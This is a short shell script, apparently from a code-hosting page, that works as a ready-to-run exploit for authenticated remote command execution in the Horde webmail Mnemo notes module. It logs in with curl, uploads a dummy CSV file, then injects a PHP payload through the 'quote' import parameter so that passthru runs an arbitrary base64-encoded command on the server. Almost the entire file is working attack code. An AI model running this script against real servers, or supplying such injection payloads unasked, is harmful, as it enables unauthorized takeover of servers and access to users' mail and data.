41 lines
No EOL
1 KiB
Bash
Executable file
41 lines
No EOL
1 KiB
Bash
Executable file
#!/bin/sh
|
|
|
|
if [ "$#" -ne 4 ]; then
|
|
echo '[!] Usage: <url> <username> <password> <command>' 1>&2
|
|
exit 1
|
|
fi
|
|
|
|
BASE="$1"
|
|
USERNAME="$2"
|
|
PASSWORD="$3"
|
|
COMMAND="$4"
|
|
|
|
JAR="$(mktemp)"
|
|
trap 'rm -f "$JAR"' EXIT
|
|
|
|
echo "[+] Logging in as $USERNAME:$PASSWORD" 1>&2
|
|
curl -si -c "$JAR" "$BASE/login.php" \
|
|
-d 'login_post=1' \
|
|
-d "horde_user=$USERNAME" \
|
|
-d "horde_pass=$PASSWORD" | grep -q 'Location: /services/portal/' || \
|
|
echo '[!] Cannot log in' 1>&2
|
|
|
|
echo "[+] Uploading dummy file" 1>&2
|
|
echo x | curl -si -b "$JAR" "$BASE/mnemo/data.php" \
|
|
-F 'actionID=11' \
|
|
-F 'import_step=1' \
|
|
-F 'import_format=csv' \
|
|
-F 'notepad_target=x' \
|
|
-F 'import_file=@-;filename=x' \
|
|
-so /dev/null
|
|
|
|
echo "[+] Running command" 1>&2
|
|
BASE64_COMMAND="$(echo -n "$COMMAND 2>&1" | base64 -w0)"
|
|
curl -b "$JAR" "$BASE/mnemo/data.php" \
|
|
-d 'actionID=3' \
|
|
-d 'import_step=2' \
|
|
-d 'import_format=csv' \
|
|
-d 'header=1' \
|
|
-d 'fields=1' \
|
|
-d 'sep=x' \
|
|
--data-urlencode "quote=).passthru(base64_decode(\"$BASE64_COMMAND\")).die();}//\\" |